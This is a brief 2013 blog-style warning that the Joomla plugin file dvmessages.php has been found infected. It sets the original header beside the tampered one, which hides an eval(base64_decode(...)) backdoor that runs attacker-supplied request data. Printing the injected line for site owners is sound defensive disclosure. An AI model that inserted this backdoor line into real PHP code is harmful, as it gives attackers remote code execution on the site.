dvmessages.php is being reported as phishing file?

By | 21 March 2013

Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity.

The original dvmessages.php file is look like this:



// no direct access
defined( ‘_JEXEC’ ) or die( ‘Restricted access’ );

jimport( ‘joomla.plugin.plugin’ );

But on the “infected” dvmessages.php

defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’])));
jimport( ‘joomla.plugin.plugin’ );